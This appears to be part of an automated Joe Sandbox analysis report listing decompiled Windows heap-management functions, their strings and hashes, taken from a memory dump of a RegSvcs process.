0x0199ebe9
0x0199ebec
0x00000000
0x0199ebe6
0x0199ebe1
0x0199eba4
0x0199eba9
0x0199ebb0
0x0199ebb3
0x00000000
0x00000000
0x00000000
0x00000000
0x0199ebab
0x0199ebab
0x0199ebab
0x0199ebac
0x0199ebac
0x00000000
0x0199ebab
0x0199eb97
0x0199eb19
0x0199eb1c
0x0199eb21
0x0199eb26
0x0199eb2c
0x0199eb2c
0x00000000
0x0199eb26
0x0199ead6
0x0199ead9
0x0199eadc
0x0199eadc
0x0199eadc
0x0199eade
0x0199eae4
0x00000000
0x00000000
0x0199eaee
0x0199eaf7
0x0199eaf9
0x00000000
0x00000000
0x0199eb04
0x0199eb12
0x00000000
0x0199eb12
0x0199eb06
0x00000000
0x0199eb06
0x0199eaf0
0x0199eaf2
0x0199eaf4
0x00000000
0x0199eaf4
0x0199ea6a
0x0199ea21
0x00000000
0x0199ea21
0x0199e9d6
0x0199e9d6
0x0199e9e0
0x0199e9e2
0x0199e9e2
0x0199e9e8
0x00000000
0x0199e9e8
0x0199e987
0x0199e98f
0x0199e992
0x0199e995
0x0199e995
0x0199e998
0x0199e998
0x0199e99a
0x0199e9a0
0x00000000
0x00000000
0x0199e9a9
0x0199e9b2
0x0199e9b4
0x00000000
0x00000000
0x0199e9ba
0x0199e9c1
0x0199e9cf
0x00000000
0x0199e9cf
0x0199e9c3
0x00000000
0x0199e9c3
0x0199e9ab
0x0199e9ad
0x0199e9af
0x00000000
0x0199e9af
0x0199e924
0x0199e8b7
0x0199e8ba
0x0199e902
0x0199e908
0x0199e90a
0x00000000
0x0199e90a
0x0199e8bc
0x0199e8bf
0x0199e8f9
0x0199e8ff
0x0199e901
0x00000000
0x0199e901
0x0199e8c1
0x0199e8c4
0x0199e8f0
0x0199e8f6
0x0199e8f8
0x00000000
0x0199e8f8
0x0199e8c6
0x0199e8c9
0x0199e8e7
0x0199e8ed
0x0199e8ef
0x00000000
0x0199e8ef
0x0199e8cb
0x0199e8ce
0x0199e8de
0x0199e8e4
0x0199e8e6
0x00000000
0x0199e8e6
0x0199e8d3
0x00000000
0x0199e8d5
0x0199e8db
0x0199e8dd
0x00000000
0x0199e8dd
0x0199e853
0x0199e855
0x0199e85b
0x0199e85d
0x0199e897
0x0199e89c
0x0199e8a2
0x0199e8a6
0x0199e8ab
0x0199e8ad
0x0199e8ad
0x00000000
0x0199e85d

APIs

RtlDebugPrintTimes.NTDLL ref: 0199EA10
RtlDebugPrintTimes.NTDLL ref: 0199ED24

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 783e3083b2fe856b45ccbae6f7d081452b180c5a26351208328ba489aeb5d390
Instruction ID: da913312cefcf212f8a70e6437bb4779a2cee290bc2a0f2c545916f1b9872248
Opcode Fuzzy Hash: 783e3083b2fe856b45ccbae6f7d081452b180c5a26351208328ba489aeb5d390
Instruction Fuzzy Hash: C102C172E006168FCF18CFADC89167EBBF6EF88201B19856DD45ADB381D634E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 018C40E1 Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E018C40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E018CB150();
					} else {
						E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E018CB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E018CB150(", passed to %s", _t29);
					}
					_push("\n");
					E018CB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x19b6378 = 1;
						asm("int3");
						 *0x19b6378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x018c40e6
0x018c40e8
0x018c40f1
0x0192042d
0x0192044c
0x01920451
0x0192042f
0x01920444
0x01920449
0x0192045d
0x01920466
0x0192046e
0x01920474
0x01920475
0x0192047a
0x0192048a
0x0192048c
0x01920493
0x01920494
0x01920494
0x00000000
0x0192049b
0x00000000

Strings

HEAP: , xrefs: 0192044C
RtlAllocateHeap, xrefs: 01920468
, passed to %s, xrefs: 01920469
Invalid heap signature for heap at %p, xrefs: 01920458
HEAP[%wZ]: , xrefs: 0192043F

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: ed75ec88fd7169b55004fc63be54a0ecd2e69a0511419b7b25c1c319ac7624c5
Instruction ID: 70f958404853fafca3adb3eae5105cc3cbd9bb8e29671762b7e4ff80218c1f97
Opcode Fuzzy Hash: ed75ec88fd7169b55004fc63be54a0ecd2e69a0511419b7b25c1c319ac7624c5
Instruction Fuzzy Hash: CA012D321059519FE225576D949EF5177A8DB40F70F2C803EF009C7785EAB8D544C211

Uniqueness

Uniqueness Score: -1.00%

Function 018EA830 Relevance: 5.4, Strings: 4, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E018EA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x19b8748 - 1;
					if( *0x19b8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E018CB150();
									_t260 = _t257 + 4;
								} else {
									E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E018CB150();
								_t257 = _t260 + 4;
								__eflags =  *0x19b7bc8;
								if(__eflags == 0) {
									E01982073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E0198A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E0191D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E018EAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E0198A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E0198A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x19b8748 - 1;
					if( *0x19b8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E018CB150();
							} else {
								E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E018CB150();
							__eflags =  *0x19b7bc8;
							if(__eflags == 0) {
								_t131 = E01982073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}

0x018ea83a
0x018ea83c
0x018ea83e
0x018ea841
0x018ea844
0x018ea84a
0x018eaa53
0x018eaa59
0x018eaa59
0x018ea858
0x018ea85e
0x018eaaf5
0x018eaafc
0x0193229e
0x019322a2
0x019322a8
0x019322b3
0x019322b5
0x019322bb
0x019322c1
0x019322c5
0x019322e6
0x019322eb
0x019322f0
0x019322c7
0x019322dc
0x019322e1
0x019322e1
0x019322f3
0x019322f8
0x019322fd
0x01932300
0x01932307
0x0193230e
0x0193230e
0x01932313
0x01932313
0x019322b5
0x019322a2
0x018eaafc
0x018ea864
0x018ea869
0x018eaa5c
0x018eaa5e
0x018ea86f
0x018ea87f
0x018ea885
0x018ea885
0x018ea88b
0x018ea890
0x018ea896
0x018eab0c
0x018eab0f
0x018eab15
0x01932320
0x01932320
0x018eab1b
0x018ea89c
0x018ea89f
0x018ea8a2
0x018ea8a2
0x018ea8a5
0x018ea8af
0x018ea8b3
0x018ea8b8
0x018eaa66
0x018ea8be
0x018ea8c5
0x018ea8c6
0x018ea8ce
0x01932328
0x01932332
0x01932337
0x01932337
0x018ea8ce
0x018ea8d4
0x018ea8d8
0x018ea8db
0x018ea8de
0x018ea8e1
0x018ea8e5
0x018ea8e8
0x018ea8f0
0x018ea8f3
0x0193234c
0x01932350
0x01932355
0x01932359
0x01932359
0x018ea8f9
0x018ea901
0x018eaae4
0x018eaae4
0x018eaaea
0x00000000
0x018ea907
0x018ea90a
0x018ea91d
0x018ea91d
0x00000000
0x018ea910
0x018ea910
0x018ea910
0x018ea914
0x018ea924
0x018ea924
0x018ea924
0x018ea924
0x018ea916
0x018ea91b
0x00000000
0x00000000
0x00000000
0x018ea91b
0x018ea925
0x018ea925
0x018ea932
0x018ea936
0x018ea93c
0x018ea93c
0x018ea93c
0x018eab22
0x018eab24
0x018eab27
0x018eab27
0x018ea942
0x018ea944
0x018eaaba
0x018eaabd
0x018eaac0
0x018eaac0
0x018eaac2
0x018eab2f
0x018eaac4
0x018eaac4
0x018eaac7
0x018eaaca
0x018eaacc
0x018eaace
0x018eaace
0x018eaace
0x018eaad1
0x018eaad1
0x018eaad7
0x018eaad9
0x00000000
0x00000000
0x01932361
0x01932369
0x0193236b
0x00000000
0x01932371
0x00000000
0x01932371
0x00000000
0x0193236b
0x018eaac0
0x018ea94a
0x018ea94a
0x018ea94d
0x018ea94d
0x018ea950
0x018ea954
0x01932376
0x01932380
0x018ea95a
0x018ea95a
0x018ea95c
0x018ea95f
0x018ea961
0x018ea961
0x018ea967
0x018ea96a
0x018ea972
0x018eaa02
0x018eaa06
0x018eaa10
0x018eaa16
0x018eaa16
0x018eaa1b
0x018eaa21
0x018eaa24
0x018eaa27
0x018eaa29
0x018eaa2c
0x018eaa32
0x00000000
0x00000000
0x00000000
0x00000000
0x018ea978
0x018ea978
0x018ea97b
0x018ea981
0x018ea996
0x018ea998
0x018ea99f
0x018ea9a2
0x0193238a
0x018ea9a8
0x018ea9a8
0x018ea9a8
0x018ea9aa
0x018ea9ad
0x018ea9b0
0x018ea9bb
0x018ea9be
0x018ea9c7
0x018ea9c9
0x018ea9c9
0x018ea9cc
0x018ea9d1
0x018eaa6d
0x018eaa70
0x018eaa73
0x018eaa75
0x018eaa79
0x018eaa7e
0x018eaa82
0x018eaa8f
0x018eaa94
0x018eaa96
0x01932392
0x019323a1
0x019323a1
0x018eaa9c
0x018eaa9f
0x018eaaa2
0x018eaaa2
0x018eaaa8
0x018eaaab
0x018eaaaf
0x00000000
0x018eaab5
0x00000000
0x018eaab5
0x018ea9d7
0x018ea9d7
0x018ea9da
0x018ea9e0
0x018ea9e3
0x018ea9e6
0x018ea9e9
0x018ea9eb
0x018ea9fd
0x018ea9fd
0x00000000
0x018ea9eb
0x00000000
0x00000000
0x00000000
0x018ea983
0x018ea983
0x018ea983
0x018ea987
0x018ea995
0x018ea995
0x018ea995
0x018ea995
0x018ea989
0x018ea98e
0x00000000
0x018ea990
0x00000000
0x018ea990
0x018ea98e
0x00000000
0x018ea983
0x018ea972
0x018ea90a
0x018eaa34
0x018eaa34
0x018eaa40
0x018eaa43
0x018eaa46
0x018eaa4d
0x019323ab
0x019323b2
0x019323b8
0x019323be
0x019323c3
0x019323c5
0x019323cb
0x019323d1
0x019323d5
0x019323f6
0x019323fb
0x019323d7
0x019323ec
0x019323f1
0x01932403
0x01932408
0x01932410
0x01932417
0x01932422
0x01932422
0x01932417
0x019323c5
0x019323b2
0x00000000

Strings

HEAP: , xrefs: 019322E6, 019323F6
((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 019322F3
ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01932403
HEAP[%wZ]: , xrefs: 019322D7, 019323E7

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: 434e68f70d00c31570b1ef99ec12f06fcaf673fcdfad2af498eac2fb6cf8d1b5
Instruction ID: 07e9daadc72b4f81be8ba2cf267b9c34f076b15c170e31732e178b7b7dc21ce9
Opcode Fuzzy Hash: 434e68f70d00c31570b1ef99ec12f06fcaf673fcdfad2af498eac2fb6cf8d1b5
Instruction Fuzzy Hash: D0D1FF34A006069FDB18CF68C494BBABBF1FF89B04F158569D95ADB342E330EA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 018EA229 Relevance: 5.2, Strings: 4, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E018EA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E018EDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E01909730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E0198A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E01909660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E018CB150();
					} else {
						E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E018CB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E018E7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E0198138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E018E7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E018E7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E01981582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E018E7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E018E7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E01981582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0191D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}

0x018ea229
0x018ea231
0x018ea23f
0x018ea242
0x018ea244
0x018ea24c
0x018ea255
0x018ea25a
0x018ea25f
0x01931c76
0x01931c78
0x01931c7e
0x01931c7f
0x01931c81
0x01931c82
0x01931c84
0x01931c89
0x01931c8b
0x01931c9e
0x01931c9e
0x01931cab
0x01931cb2
0x00000000
0x01931cb2
0x01931c8d
0x01931c92
0x00000000
0x00000000
0x01931c94
0x01931c98
0x00000000
0x00000000
0x00000000
0x01931c98
0x018ea265
0x018ea265
0x018ea266
0x018ea26f
0x018ea270
0x018ea276
0x018ea277
0x018ea279
0x018ea27e
0x018ea282
0x01931db5
0x01931dbb
0x01931dc1
0x01931dc5
0x01931de4
0x01931de9
0x01931dc7
0x01931ddc
0x01931de1
0x01931def
0x01931df3
0x01931df7
0x01931dfe
0x01931e06
0x018ea302
0x018ea308
0x018ea308
0x018ea288
0x018ea28d
0x018ea294
0x01931cc1
0x018ea29a
0x018ea29a
0x018ea29a
0x018ea29f
0x01931ccb
0x01931cd1
0x01931cd8
0x01931cea
0x01931cea
0x01931cd8
0x018ea2a9
0x018ea2af
0x018ea2bc
0x01931cfd
0x018ea2c2
0x018ea2c2
0x018ea2c2
0x018ea2c7
0x01931d07
0x01931d0d
0x01931d14
0x01931d1f
0x01931d21
0x01931d2c
0x01931d2c
0x01931d2c
0x01931d47
0x01931d47
0x01931d14
0x018ea2cd
0x018ea2d2
0x018ea2d9
0x01931d5a
0x018ea2df
0x018ea2df
0x018ea2df
0x018ea2e4
0x01931d69
0x01931d6b
0x01931d76
0x01931d76
0x01931d76
0x01931d91
0x01931d91
0x018ea2ea
0x018ea2f0
0x018ea2f5
0x01931da8
0x01931dad
0x01931dad
0x018ea2fd
0x018ea300
0x00000000

Strings

HEAP: , xrefs: 01931DE4
`, xrefs: 01931C8D
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 01931DF9
HEAP[%wZ]: , xrefs: 01931DD7

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
